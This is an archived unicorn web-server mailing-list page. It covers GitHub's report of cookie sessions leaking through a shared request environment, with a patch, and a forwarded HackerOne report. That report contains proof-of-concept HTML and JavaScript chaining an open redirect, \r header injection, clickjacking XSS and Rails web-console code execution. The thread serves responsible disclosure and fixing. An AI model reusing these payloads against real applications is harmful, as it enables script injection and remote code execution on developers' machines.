> > codebase that was only intended to be single-threaded.  And
> > using Thread.current[...] here wouldn't have made a difference.
> 
> For us it was also the difference between “requests are handled single threaded”
> vs “you can’t use threads for anything else either.” We were totally aware of the
> first, but the latter seems more accidental and has a much broader impact. 

Agreed.

> > I worry some endpoints out there will suffer performance
> > degradation.  Expensive endpoints probably won't notice,
> > but maybe the fastest ones will...
> 
> That is a good point, but I think in practice most users do enough in most
> requests that the trade off is totally worth it. At least for us it definitely
> is. Maybe it would be an option to make the sharing somehow opt-in instead of
> default behavior? So that by default the safe behavior is used, but for those
> that want to, they can opt into the sharing if they know their app is safe
> enough to work with that. 

I'm not in favor of new options since they add support costs
and increase the learning/maintenance curve.

What I've been thinking about is bumping the major version to 6.0

Although our internals are technically not supported stable API,
there may be odd stuff out there similar to OobGC that uses
instance_variable_get or similar things to reach into internals.
Add to that the fact that our internals haven't changed in many
years, and I'm inclined to believe there are other OobGC-like
things out there that can break.

Also, with 6.0; users who completely avoid Threads can keep
using 5.x, while others can use 6.x

> >> For the sake of transparency to our users, we plan on publishing a public
> >> post next week on how this was part of the larger series of bugs that had a
> >> security impact at GitHub. We've also attached a suggested patch that removes
> >> the environment sharing, which is what we're running right now to reduce the
> >> risk of this ever happening again.
> > 
> > Did you measure performance degradations in any endpoints you have?
> 
> We did measure and there were zero noticeable performance degradations. That’s
> also because all our requests do a bunch of work and are not direct Rack apps,
> and use stuff like Rails or Sinatra. Those all usually wrap the `env` hash
> anyway with their own per request object and there’s a lot of other allocations
> happening anyway.
> 
> In microbenchmarks we could see a difference, but even there, at least for us,
> we’d gladly pay the performance price for the safety if we’d have any endpoints
> where it would be measurable. 

OK.  Fwiw, there's still some stones left unturned that could
recover the lost speed if somebody _really_ cares for it(*)

(*) String#clear on response header buffer, swapping Ragel
    for a faster HTTP parser, ...

> All in all, I think here that a safe default would be helpful for users, as
> mentioned earlier, and that maybe for those cases where the latest performance
> bit matters, the existing behavior could be opted into. Whether this option is
> worth it from a maintenance standpoint is something you’re better able to answer
> than we are though.

It's probably OK and I'm inclined to accept your patch for 6.0.

At this point, I'm more worried about potential breakage of some
3rd-party OobGC-like thing that reaches deep into our internals.

Btw, did you consider replacing the @request HttpRequest object
entirely instead of the env and buf elements?
I suppose that's more allocations, still; but could've
been a smaller change.

> > I'll see about finding a less-noisy/overloaded system to run
> > benchmarks against...
> > 
> > I noticed some of the OobGC tests in t/ were failing (patch below),
> > but few users use that version of OobGC.
> 
> I wasn’t easily able to run the entire suite, but only parts of it which is why
> I didn’t have a complete fix there. I can add this to the patch then.

Oops, was that the integration tests in t/* ?
They can run separately via "make test-integration"
(I never trusted some Ruby behaviors to remain stable,
 so I started writing tests in Bourne shell).

<snip> I have nothing to add to the rest of the mail

unicorn-public readers: see attachments

[-- Attachment #2: 0001-potential-unicorn-vulnerability.eml --]
[-- Type: message/rfc822, Size: 12105 bytes --]

[-- Attachment #2.1.1: Type: text/plain, Size: 2813 bytes --]

Hello Eric,

We're reaching out privately first on what we think could be classified as a
security issue in Unicorn. Since there may be other similarly impacted users,
this is out of an abundance of caution before sending it to the public
Unicorn mailing list.

The issue at hand is that the environment sharing and reuse between requests
in Unicorn, combined with other non thread safe code, resulted in a security
vulnerability where a very small number of user sessions tracked through
cookies got misrouted. For this reason, we logged everyone out of GitHub, see
also https://github.blog/2021-03-08-github-security-update-a-bug-related-to-handling-of-authenticated-sessions/. 

The unsafe background thread code we had ended up triggering an exception at
rare times and the exception tracking logic was using a deferred block
executed through a Ruby Proc to gather information, including things from the
request at the time the logic started.

That thread captured something from the cookie jar among other things, and
the following code in Rack memoized that into the (shared) environment.

From https://github.com/rack/rack/blob/2.1.4/lib/rack/request.rb#L219-L229

def cookies
  hash = fetch_header(RACK_REQUEST_COOKIE_HASH) do |k|
    set_header(k, {})
  end
  string = get_header HTTP_COOKIE

  return hash if string == get_header(RACK_REQUEST_COOKIE_STRING)
  hash.replace Utils.parse_cookies_header string
  set_header(RACK_REQUEST_COOKIE_STRING, string)
  hash
end

Because of the environment sharing, the memoization ended up overriding what
would be memoized (with the RACK_REQUEST_COOKIE_STRING key) for the new
request, and because a specific session cookie was then bumped with a new
timeout on each request, the wrong session cookie was serialized.

While we understand and appreciate that Unicorn is not a multi-threaded web
server, it feels like using the same `Hash` object between requests
introduces the chance that a dependency like an external gem may use threads
and thus potentially leak information between requests.

For the sake of transparency to our users, we plan on publishing a public
post next week on how this was part of the larger series of bugs that had a
security impact at GitHub. We've also attached a suggested patch that removes
the environment sharing, which is what we're running right now to reduce the
risk of this ever happening again.

We hope you're open to collaborating on a fix prior to any public detailed
disclosure of how this request environment sharing could lead to security
issues, if you feel that is desired. 

I’ve added John & Kevin here on the CC since they’ve also worked on this and
that way we have some better timezone spread on our side if needed. 

Cheers,

Dirkjan Bussink


[-- Attachment #2.1.2: 0001-Drop-reuse-of-Ruby-level-objects.patch --]
[-- Type: application/octet-stream, Size: 4067 bytes --]

From 44aa6b056e1b24d42ab3efba738b38f4cd54a068 Mon Sep 17 00:00:00 2001
From: Dirkjan Bussink <d.bussink@gmail.com>
Date: Mon, 8 Mar 2021 09:51:09 +0100
Subject: [PATCH] Drop reuse of Ruby level objects

Remove the reuse of environment and the buffer as Ruby level objects.
Reusing these is very risky in the context of running any other threads
within the unicorn process, also for threads that run background tasks.

This lead to a significant security incident where the problems would
not have happened if there was no reuse of the `env` object. From a
safety perspective, this also removes reuse of the buffer object as it's
also a Ruby object and could be grabbed and retained outside of the http
parsing logic.

The downside here is that we allocate two extra objects on each request,
but that is worth the trade off here and the security risk we otherwise
would carry to leaking wrong and incorrect data.
---
 ext/unicorn_http/extconf.rb      |  1 -
 ext/unicorn_http/unicorn_http.rl | 30 +++---------------------------
 test/unit/test_http_parser.rb    |  3 +++
 3 files changed, 6 insertions(+), 28 deletions(-)

diff --git a/ext/unicorn_http/extconf.rb b/ext/unicorn_http/extconf.rb
index 95514bc..7e4775c 100644
--- a/ext/unicorn_http/extconf.rb
+++ b/ext/unicorn_http/extconf.rb
@@ -10,7 +10,6 @@
 have_macro("SIZEOF_SIZE_T", "ruby.h") or check_sizeof("size_t", "sys/types.h")
 have_macro("SIZEOF_LONG", "ruby.h") or check_sizeof("long", "sys/types.h")
 have_func("rb_str_set_len", "ruby.h") or abort 'Ruby 1.9.3+ required'
-have_func("rb_hash_clear", "ruby.h") # Ruby 2.0+
 have_func("gmtime_r", "time.h")
 
 message('checking if String#-@ (str_uminus) dedupes... ')
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index 21e09d6..9904d85 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -65,18 +65,6 @@ struct http_parser {
 static ID id_set_backtrace, id_is_chunked_p;
 static VALUE cHttpParser;
 
-#ifdef HAVE_RB_HASH_CLEAR /* Ruby >= 2.0 */
-#  define my_hash_clear(h) (void)rb_hash_clear(h)
-#else /* !HAVE_RB_HASH_CLEAR - Ruby <= 1.9.3 */
-
-static ID id_clear;
-
-static void my_hash_clear(VALUE h)
-{
-  rb_funcall(h, id_clear, 0);
-}
-#endif /* HAVE_RB_HASH_CLEAR */
-
 static void finalize_header(struct http_parser *hp);
 
 static void parser_raise(VALUE klass, const char *msg)
@@ -445,6 +433,8 @@ static void http_parser_init(struct http_parser *hp)
   hp->cont = Qfalse; /* zero on MRI, should be optimized away by above */
   %% write init;
   hp->cs = cs;
+  hp->buf = rb_str_new(NULL, 0);
+  hp->env = rb_hash_new();
 }
 
 /** exec **/
@@ -628,8 +618,6 @@ static VALUE HttpParser_init(VALUE self)
   struct http_parser *hp = data_get(self);
 
   http_parser_init(hp);
-  hp->buf = rb_str_new(NULL, 0);
-  hp->env = rb_hash_new();
 
   return self;
 }
@@ -643,16 +631,7 @@ static VALUE HttpParser_init(VALUE self)
  */
 static VALUE HttpParser_clear(VALUE self)
 {
-  struct http_parser *hp = data_get(self);
-
-  /* we can't safely reuse .buf and .env if hijacked */
-  if (HP_FL_TEST(hp, HIJACK))
-    return HttpParser_init(self);
-
-  http_parser_init(hp);
-  my_hash_clear(hp->env);
-
-  return self;
+  return HttpParser_init(self);
 }
 
 static void advance_str(VALUE str, off_t nr)
@@ -1025,9 +1004,6 @@ void Init_unicorn_http(void)
   id_set_backtrace = rb_intern("set_backtrace");
   init_unicorn_httpdate();
 
-#ifndef HAVE_RB_HASH_CLEAR
-  id_clear = rb_intern("clear");
-#endif
   id_is_chunked_p = rb_intern("is_chunked?");
 }
 #undef SET_GLOBAL
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 697af44..d3f9ae7 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -33,6 +33,9 @@ def test_parse_simple
     parser.clear
     req.clear
 
+    req = parser.env
+    http = parser.buf
+
     http << "G"
     assert_nil parser.parse
     assert_equal "G", http
-- 
2.30.1


[-- Attachment #3: 0002-re-potential-unicorn-vulnerability.eml --]
[-- Type: message/rfc822, Size: 5635 bytes --]

From: Eric Wong <normalperson@yhbt.net>
To: Dirkjan Bussink <dbussink@github.com>
Cc: John Crepezzi <seejohnrun@github.com>, Kevin Sawicki <kevinsawicki@github.com>
Subject: Re: Potential Unicorn vulnerability
Date: Thu, 11 Mar 2021 03:02:50 +0000
Message-ID: <20210311030250.GA1266@dcvr>

Dirkjan Bussink <dbussink@github.com> wrote:
> Hello Eric,
> 
> We're reaching out privately first on what we think could be classified as a
> security issue in Unicorn. Since there may be other similarly impacted users,
> this is out of an abundance of caution before sending it to the public
> Unicorn mailing list.

Thanks for reaching out.  Fwiw, I prefer if everything were made
public right away, but I'll leave it up to you if you're not
comfortable with it.

I don't know much about security, anyways; and don't like
classifying bugs (or classifying anything)...

<snip>

> That thread captured something from the cookie jar among other things, and
> the following code in Rack memoized that into the (shared) environment.

Ouch, so the hijack check we had in HttpParser_clear didn't fire...

<snip>

> While we understand and appreciate that Unicorn is not a multi-threaded web
> server, it feels like using the same `Hash` object between requests
> introduces the chance that a dependency like an external gem may use threads
> and thus potentially leak information between requests.

Yes, there's likely problems in trying to use threads with a
codebase that was only intended to be single-threaded.  And
using Thread.current[...] here wouldn't have made a difference.

I worry some endpoints out there will suffer performance
degradation.  Expensive endpoints probably won't notice,
but maybe the fastest ones will...

`buf' is particularly worrying to me since it's a 16384-byte
allocation for a socket read on headers that could amount
to lots of GC pressure and hurt locality all around.

env['rack.input'] may also hold onto `buf', too, since
input is lazily-consumed (though it may be possible to
workaround that...).

Losing `env' is probably less worrying since keys are all
fstrings in modern Rubies.  Though losing the backing store (and
not having rb_hash_new_with_size in the C API) would mean more
rehashing with many headers.
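
(For example, a quick check in irb that duplicated header-key strings
share one frozen copy on Ruby 2.5+:

  a = -'HTTP_HOST'   # String#-@ dedupes via the fstring table
  b = -'HTTP_HOST'
  a.equal?(b)        # => true, same object

so rebuilding the env hash each request does not duplicate the key
strings themselves.)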

The simple Rack apps I worked on back in-the-day which
benefitted from these object-reuse optimizations are unlikely to
be upgraded to newer versions of unicorn.  Of course, there
may be other similar Rack apps out there that depend on these...

> For the sake of transparency to our users, we plan on publishing a public
> post next week on how this was part of the larger series of bugs that had a
> security impact at GitHub. We've also attached a suggested patch that removes
> the environment sharing, which is what we're running right now to reduce the
> risk of this ever happening again.

Did you measure performance degradations in any endpoints you have?

I'll see about finding a less-noisy/overloaded system to run
benchmarks against...

I noticed some of the OobGC tests in t/ were failing (patch below),
but few users use that version of OobGC.

Also, t/t0200-rack-hijack.sh would go away.

> We hope you're open to collaborating on a fix prior to any public detailed
> disclosure of how this request environment sharing could lead to security
> issues, if you feel that is desired. 

Sure, as long as everything is done via plain-text email so
I won't need working graphics drivers or modern hardware :>

Along the same lines, would you be OK with this entire mail thread
(including all mail headers) being eventually published in the
public mailbox at http://ou63pmih66umazou.onion/unicorn-public/
and https://yhbt.net/unicorn-public/ ?

> I’ve added John & Kevin here on the CC since they’ve also worked on this and
> that way we have some better timezone spread on our side if needed. 

OK, I'm around/awake at pretty random times.

Aforementioned OobGC change:
-------8<-------
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index 3b2f488..91a8e51 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -60,7 +60,6 @@ def self.new(app, interval = 5, path = %r{\A/})
     self.const_set :OOBGC_INTERVAL, interval
     ObjectSpace.each_object(Unicorn::HttpServer) do |s|
       s.extend(self)
-      self.const_set :OOBGC_ENV, s.instance_variable_get(:@request).env
     end
     app # pretend to be Rack middleware since it was in the past
   end
@@ -68,9 +67,10 @@ def self.new(app, interval = 5, path = %r{\A/})
   #:stopdoc:
   def process_client(client)
     super(client) # Unicorn::HttpServer#process_client
-    if OOBGC_PATH =~ OOBGC_ENV['PATH_INFO'] && ((@@nr -= 1) <= 0)
+    env = instance_variable_get(:@request).env
+    if OOBGC_PATH =~ env['PATH_INFO'] && ((@@nr -= 1) <= 0)
       @@nr = OOBGC_INTERVAL
-      OOBGC_ENV.clear
+      env.clear
       disabled = GC.enable
       GC.start
       GC.disable if disabled

^ permalink raw reply related	[relevance 1%]

* Re: [RFC] http_response: ignore invalid header response characters
  2021-01-06 17:53  2% ` Eric Wong
@ 2021-01-13 23:20  1%   ` Sam Sanoop
  0 siblings, 0 replies; 200+ results
From: Sam Sanoop @ 2021-01-13 23:20 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Hi, the researcher didn't test it with Nginx; his configuration
according to the report was:

server: unicorn (<= latest)
Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production


But reading http://blog.volema.com/nginx-insecurities.html, CRLF can
be allowed if a user is using $uri variables within their NGINX
config. So conditions within NGINX would need to be met.

Regarding the hackerone report, here is a txt version of the report:


ooooooo_q-----------------

Hello,
I was looking at the change log
(https://github.com/rails/rails/commit/2121b9d20b60ed503aa041ef7b926d331ed79fc2)
for CVE-2020-8185 and found another problem existed.

https://github.com/rails/rails/blob/v6.0.3.1/actionpack/lib/action_dispatch/middleware/actionable_exceptions.rb#L21

  redirect_to request.params[:location]
end

private
  def actionable_request?(request)
    request.show_exceptions? && request.post? && request.path == endpoint
  end

  def redirect_to(location)
    body = "<html><body>You are being <a
href=\"#{ERB::Util.unwrapped_html_escape(location)}\">redirected</a>.</body></html>"

    [302, {
      "Content-Type" => "text/html; charset=#{Response.default_charset}",
      "Content-Length" => body.bytesize.to_s,
      "Location" => location,
    }, [body]]
  end
There was an open redirect issue because the request parameter
location was not validated.
In 6.0.3.2, since the condition of actionable_request? has changed,
this problem is less likely to occur.

PoC
1. Prepare server
Prepare an attackable 6.0.3.1 version of Rails server

❯ rails -v
Rails 6.0.3.1

❯ RAILS_ENV=production rails s
...
* Environment: production
* Listening on tcp://0.0.0.0:3000
2. Attack server
Prepare the server for attack on another port.

<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=https://www.hackerone.com/">
    <button type="submit">click!</button>
</form>
python3 -m http.server 8000
3. Open browser
Open the http://localhost:8000/attack.html url in your browser and
click the button.
Redirect to https://www.hackerone.com/ url.



Impact
It will be fixed with 6.0.3.2 as with
CVE-2020-8185(https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0),
but I think it is necessary to announce it again because the range of
influence is different.

This open redirect changes from the POST method to the GET method, so it may
be difficult to use for phishing. On the other hand, it may affect
bypass of referrer checks or SSRF.



ooooooo_q------

I thought about it after submitting the report, but even in 6.0.3.2,
/rails/actions is available in development mode.
If the app was started in development mode, the request can still be
made via CSRF, so the same issue as CVE-2020-8185 still exists.
I think it's better to take CSRF measures in /rails/actions.

Vulnerabilities, versions and modes:

  6.0.3.1 (production, development)
    - run pending migrations (CVE-2020-8185)
    - open redirect
  6.0.3.2 (development)
    - run pending migrations (by CSRF)
    - open redirect (by CSRF)
  6.0.3.2 (production)
    - no problem


tenderlove (Ruby on Rails staff) -------

This seems like a good improvement, but I don't think we need to treat
it as a security issue. If you agree, would you mind filing an issue
on the Rails GitHub issues?
Thank you!


ooooooo_q------

@tenderlove
I'm sorry to reply late.

While researching unicorn, I found this report to lead to other vulnerabilities.

Open Redirect to HTTP header injection
Response header injection vulnerability exists in versions of puma below 4.3.2.
https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v
I have confirmed that unicorn is also vulnerable to response header injection.

HTTP header injection is possible by including \r in the redirect URL
using these.

PoC
> escape("\rSet-cookie:a=a")
"%0DSet-cookie%3Aa%3Da"
This is the html used on the attack server.

<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0DSet-cookie%3Aa%3Da">
  <button type="submit">set cookie</button>
</form>
When you click this button, the response header will be as follows.

Location:
Set-cookie: a=a
If you open the developer tools in your browser, you'll see that the
cookie value is set.

When I tried it, puma and unicorn can insert only the character of \r,
and it seems that \n cannot be inserted.
Therefore, it seems that response body injection that leads to XSS
cannot be performed.

On the other hand, in passenger, it became an error when \r was in the
value of the header.

XSS trick
While trying out \r on the response header, I noticed a strange thing.
If \r is at the beginning, it means that the browser is not redirected
and javascript: can be used in the URL of the response link.
When specifying \rjavascript:alert(location) as the redirect destination,
the HTML of the response will be as follows.

<html><body>You are being <a href="
javascript:alert(location)">redirected</a>.</body></html>
The \r character is ignored in html, so javascript:alert(location) is
executed when the user clicks the link.

This is a separate issue from HTTP header injection and depends on how
the server handles the value of \r.
In puma and unicorn below 4.3.2, \r is used for HTTP header injection,
so no error occurs.
With puma 4.3.3 or later, if there is a line containing \r, it does
not become an error and it can be executed because that line is
excluded.
On the other hand, the error occurred in passenger.

As a further issue, the headers in this response are
middleware-specific and therefore do not include the security headers
Rails is outputting.
Since X-Frame-Options is not included, clickjacking is possible.
CSP headers are not output either, even if CSP is set in the application.

By using clickjacking in combination with these, it is easy to
generate an XSS that requires a user click.

PoC
Inserting the execution code from another site using the name of the iframe.

This PoC will also run in production mode if 6.0.0 < rails < 6.0.3.2.
It can be run with the latest puma and unicorn.

If it is development mode, it can be executed even after 6.0.3.2

child.html
<form method="post"
action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aeval%28name%29">
    <button type="submit">location is escape("\rjavascript:eval(name)")</button>
</form>
<script type="text/javascript">
    document.querySelector("button").click();
</script>
click_jacking.html
<html>
<style>
iframe{
    position: absolute;
    z-index: 1;
    opacity: 0.3;
}
div{
    position: absolute;
    top: 20px;
    left: 130px;
}
button {
    width: 80px;
    height: 26px;
    cursor: pointer;
}
</style>
<body>
    <iframe src=./child.html name="alert(location)" height=40></iframe>
    <div>
        <button>click!!</button>
    </div>
</body>
</html>



XSS to RCE
When XSS exists in development mode, I confirmed that calling the
method of web-cosole leads to RCE.
RCE is possible by inducing users who are developing Rails
applications to click on the trap site.

PoC
var iframe = document.createElement("iframe");
iframe.src = "/not_found";
document.body.appendChild(iframe);
setTimeout(()=>fetch("/__web_console/repl_sessions/" +
iframe.contentDocument.querySelector("#console").dataset.sessionId, {
    method: "PUT",
    headers: {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    },
    body: JSON.stringify({
        input: "`touch from_web_console`"
    })
}), 2000)
<iframe src=./child.html name='var iframe =
document.createElement("iframe");iframe.src =
"/not_found";document.body.appendChild(iframe);setTimeout(()=>
fetch("/__web_console/repl_sessions/"+iframe.contentDocument.querySelector("#console").dataset.sessionId,
{method: "PUT",headers: {"Content-Type":
"application/json","X-Requested-With": "XMLHttpRequest"},body:
JSON.stringify({input: "`touch from_web_console`"})}),2000)'/>
When this is run, a file from from_web_console will be generated.

Vulnerabilities and conditions
Run pending migrations (CVE-2020-8185)
server: any

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

Run pending migrations by CSRF
server: any

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

Open redirect (from POST method)
server: any

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

HTTP header injection
server: unicorn (<= latest) or puma (< 4.3.2)

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

XSS (need user click)
server: unicorn (<= latest) or puma (<= latest)

Rails version: 6.0.0 < rails < 6.0.3.2
RAILS_ENV: production

or

Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development

RCE (from XSS)
server: unicorn (<= latest) or puma (<= latest)
Rails version: 6.0.0 < (not fixed)
RAILS_ENV: development



ooooooo_q------

When I tried it, puma and unicorn can insert only the character of \r,
and it seems that \n cannot be inserted.
Makes sense. This seems like a security vulnerability in Puma / Unicorn.
This is a separate issue from HTTP header injection and depends on how
the server handles the value of \r.
I'm not sure exactly which servers are vulnerable (this is too
confusing for me 😔), but whatever handles generating the response
page shouldn't allow \r at the beginning of the href like that.
So this needs to check that location is a url (http or https).
I don't think we need to set the security policy for the redirect page
if we prevent the javascript: location from the href.
How does this patch look?

On Wed, Jan 6, 2021 at 5:53 PM Eric Wong <bofh@yhbt.net> wrote:
>
> Sam Sanoop <sams@snyk.io> wrote:
> > Hi Eric,
>
> cf. https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
> (private followup <CAEQPCYJJdriMQyDNXimCS_kBrc_=DxhxJ66YdJmCe7ZXr-Zbvg@mail.gmail.com>)
>
> Hi Sam, I'm moving this to the public list.  Please keep
> unicorn-public@yhbt.net Cc-ed (no need to quote, archives are
> public and mirrored to several places).
>
> > I wanted to bring this up again. I spoke with the researcher
> > (@ooooooo_q) who disclosed this issue to us. He released the full
> > details including the HackerOne report pubclily which provided more
> > clarity about this issue. That can be read here:
> > https://hackerone.com/reports/904059#activity-8945588
>
> Note: I can't read anything on hackerone due to the JavaScript
> requirement.  If somebody can copy the text here, that'd be
> great.
>
> > That report was initially disclosed to the Ruby on Rails maintainers.
> > In certain conditions, he was also able to leverage Puma and Unicorn
> > to exploit the issues mentioned on the report. The issues which
> > related to Unicorn were:
> >
> > * Open Redirect to HTTP header injection - (including \r in the redirect URL)
> > * A user interaction XSS  - Which leverages
> > \rjavascript:alert(location) as the redirect destination
>
> Does this happen when unicorn is behind nginx?
>
> unicorn was always designed to run behind nginx and falls over badly
> without it (trivially DoS-ed via slowloris)
>
> > Reading that advisory, I see this more of an issue now. He has
> > leveraged Unicorn and Puma along with Rails to demonstrate some of the
> > proof of concepts. Under the section Vulnerabilities and conditions of
> > the report, he has specified different conditions and configurations
> > which allow for this vector.
> >
> > I agree with Aaron Patterson's (Rails Staff) decision on that report,
> > this should be fixed in Unicorn and Puma directly, and Puma has
> > already fixed this and issued an advisory:
> > https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v.
> >
> > I believe there is enough of a risk to fix this issue. What do you think?
>
> While we follow puma on some things (as in recent non-rack
> features), I'm not sure if this affects unicorn the same way it
> affects puma and other servers (that are supported without nginx).
>
> Fwiw, I've been against client-side JavaScript for a decade, now.
> Libre license or not; the complexity of JS gives us a never-ending
> stream of vulnerabilities, wasted RAM, CPU cycles, and bandwidth
> use from constant software updates needed to continue the game of
> whack-a-mole.
>
> rest of thread below (top-posting corrected):
>
> > > On Sun, Jan 3, 2021 at 10:20 PM Eric Wong <bofh@yhbt.net> wrote:
> > > >
> > > > Sam Sanoop <sams@snyk.io> wrote:
> > > > > Hey Eric,
> > > > >
> > > > > Happy New Year. I want to follow up on the [RFC] http_response: ignore
> > > > > invalid header response character RFC for the CRLF injection we spoke
> > > > > about previously. I wanted to know what would be the timeline for your
> > > > > patch to get merged and what additional steps there are before that
> > > > > can happen.
> > > >
> > > > Hi Sam, honestly I have no idea if it's even necessary...
> > > > I've had no feedback since 2020-11-26:
> > > >   https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
> > > >
> > > > Meanwhile 5.8.0 was released 2020-12-24 with a feature somebody
> > > > actually cared about.
> > > >
> > > > Again, unicorn falls over without nginx in front of it anyways,
> > > > so maybe nginx already guards against this and extra code is
> > > > unnecessary on my end.
> >
> > On Sun, Jan 3, 2021 at 11:03 PM Sam Sanoop <sams@snyk.io> wrote:
> > >
> > > Hey Eric,
> > >
> > > No problem, I understand. Since the injection here is happening within
> > > the response, I am not convinced if this is exploitable as well. I
> > > have let the reporter of this issue know what your stance is. I
> > > mentioned if he can provide a better Proof of Concept where this is
> > > exploitable in the context of a http request, and look into this a bit
> > > further, we can open up discussion again, or else, this is not worth
> > > fixing.



-- 

Sam Sanoop
Security Analyst

^ permalink raw reply	[relevance 1%]

* Re: [RFC] http_response: ignore invalid header response characters
  @ 2021-01-06 17:53  2% ` Eric Wong
  2021-01-13 23:20  1%   ` Sam Sanoop
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2021-01-06 17:53 UTC (permalink / raw)
  To: Sam Sanoop; +Cc: unicorn-public

Sam Sanoop <sams@snyk.io> wrote:
> Hi Eric,

cf. https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
(private followup <CAEQPCYJJdriMQyDNXimCS_kBrc_=DxhxJ66YdJmCe7ZXr-Zbvg@mail.gmail.com>)

Hi Sam, I'm moving this to the public list.  Please keep
unicorn-public@yhbt.net Cc-ed (no need to quote, archives are
public and mirrored to several places).

> I wanted to bring this up again. I spoke with the researcher
> (@ooooooo_q) who disclosed this issue to us. He released the full
> details including the HackerOne report publicly which provided more
> clarity about this issue. That can be read here:
> https://hackerone.com/reports/904059#activity-8945588

Note: I can't read anything on hackerone due to the JavaScript
requirement.  If somebody can copy the text here, that'd be
great.

> That report was initially disclosed to the Ruby on Rails maintainers.
> In certain conditions, he was also able to leverage Puma and Unicorn
> to exploit the issues mentioned on the report. The issues which
> related to Unicorn were:
> 
> * Open Redirect to HTTP header injection - (including \r in the redirect URL)
> * A user interaction XSS  - Which leverages
> \rjavascript:alert(location) as the redirect destination

Does this happen when unicorn is behind nginx?

unicorn was always designed to run behind nginx and falls over badly
without it (trivially DoS-ed via slowloris)

> Reading that advisory, I see this more of an issue now. He has
> leveraged Unicorn and Puma along with Rails to demonstrate some of the
> proof of concepts. Under the section Vulnerabilities and conditions of
> the report, he has specified different conditions and configurations
> which allow for this vector.
> 
> I agree with Aaron Patterson's (Rails Staff) decision on that report,
> this should be fixed in Unicorn and Puma directly, and Puma has
> already fixed this and issued an advisory:
> https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v.
> 
> I believe there is enough of a risk to fix this issue. What do you think?

While we follow puma on some things (as in recent non-rack
features), I'm not sure if this affects unicorn the same way it
affects puma and other servers (that are supported without nginx).

Fwiw, I've been against client-side JavaScript for a decade, now.
Libre license or not; the complexity of JS gives us a never-ending
stream of vulnerabilities, wasted RAM, CPU cycles, and bandwidth
use from constant software updates needed to continue the game of
whack-a-mole.

rest of thread below (top-posting corrected):

> > On Sun, Jan 3, 2021 at 10:20 PM Eric Wong <bofh@yhbt.net> wrote:
> > >
> > > Sam Sanoop <sams@snyk.io> wrote:
> > > > Hey Eric,
> > > >
> > > > Happy New Year. I want to follow up on the [RFC] http_response: ignore
> > > > invalid header response character RFC for the CRLF injection we spoke
> > > > about previously. I wanted to know what would be the timeline for your
> > > > patch to get merged and what additional steps there are before that
> > > > can happen.
> > >
> > > Hi Sam, honestly I have no idea if it's even necessary...
> > > I've had no feedback since 2020-11-26:
> > >   https://yhbt.net/unicorn-public/20201126115902.GA8883@dcvr/
> > >
> > > Meanwhile 5.8.0 was released 2020-12-24 with a feature somebody
> > > actually cared about.
> > >
> > > Again, unicorn falls over without nginx in front of it anyways,
> > > so maybe nginx already guards against this and extra code is
> > > unnecessary on my end.
>
> On Sun, Jan 3, 2021 at 11:03 PM Sam Sanoop <sams@snyk.io> wrote:
> >
> > Hey Eric,
> >
> > No problem, I understand. Since the injection here is happening within
> > the response, I am not convinced if this is exploitable as well. I
> > have let the reporter of this issue know what your stance is. I
> > mentioned if he can provide a better Proof of Concept where this is
> > exploitable in the context of a http request, and look into this a bit
> > further, we can open up discussion again, or else, this is not worth
> > fixing.

^ permalink raw reply	[relevance 2%]

* [PATCH] build: publish_doc: remove created.rid and index.html from site
@ 2020-12-24 20:40  7% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-12-24 20:40 UTC (permalink / raw)
  To: unicorn-public

created.rid has no business being published anyways, and
index.html is redundant given README.html.  Avoid confusing
search engines with identical documents at different URLs.

Our "homepage" is just a directory listing, now, which should
help discoverability of non-HTML docs.  Old content is at
https://yhbt.net/unicorn/README.html
---
 GNUmakefile | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/GNUmakefile b/GNUmakefile
index d80e6080..dd0a761a 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -245,7 +245,8 @@ publish_doc:
 	$(MAKE) doc
 	$(MAKE) doc_gz
 	chmod 644 $$(find doc -type f)
-	$(RSYNC) -av doc/ yhbt.net:/srv/yhbt/unicorn/
+	$(RSYNC) -av doc/ yhbt.net:/srv/yhbt/unicorn/ \
+		--exclude index.html* --exclude created.rid*
 	git ls-files | xargs touch
 
 # Create gzip variants of the same timestamp as the original so nginx

^ permalink raw reply related	[relevance 7%]

* Re: [PATCH] Update ruby_version requirement to allow ruby 3.0
  @ 2020-09-08  8:50  3%                           ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2020-09-08  8:50 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> > Ah, perhaps adding some checks to extconf.rb would be useful?
